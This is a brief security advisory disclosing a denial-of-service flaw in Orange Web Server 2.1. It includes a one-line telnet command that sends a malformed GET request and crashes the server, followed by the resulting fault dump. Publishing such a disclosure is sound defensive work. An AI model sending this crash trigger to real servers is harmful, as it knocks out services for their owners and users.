|
|
| |
| Orange Web Server is a web server based on GoAhead web server technology. A security vulnerability in the product allows remote attackers to cause a Denial of Service attack. |
| |
Credit:
The information has been provided by slipy.
|
| |
Vulnerable systems:
Orange Web Server version 2.1
Example:
The following trivial command:
echo "GET A" | telnet 192.168.0.20 80
Will cause the server to crash:
ORANGEWEBSERVER caused an invalid page fault in module ORANGEWEBSERVER.EXE at 016f:00409694.
Registers:
EAX=49703d50 CS=016f EIP=00409694
EFLGS=00010246 EBX=009dfe84 SS=0177
ESP=009dfbb8 EBP=009dfe8c ECX=00000000
DS=0177 ESI=00416362 FS=84cf EDX=00000000
ES=0177 EDI=00000000 GS=0000 Bytes at CS:EIP:
f7 71 04 5e 8b c2 c3 90 90 90 90 90 56 8b 74 24
Stack dump:
00416350 004094a7 00000000 00416350 ffffffff
009dfbf0 009dfe8c 009dfe84 00418644 ffffffff
006d8e8c 00410b62 00000000 00416350 006d949c
00000000
Vendor Status:
Vendor has been notified.
|
|
|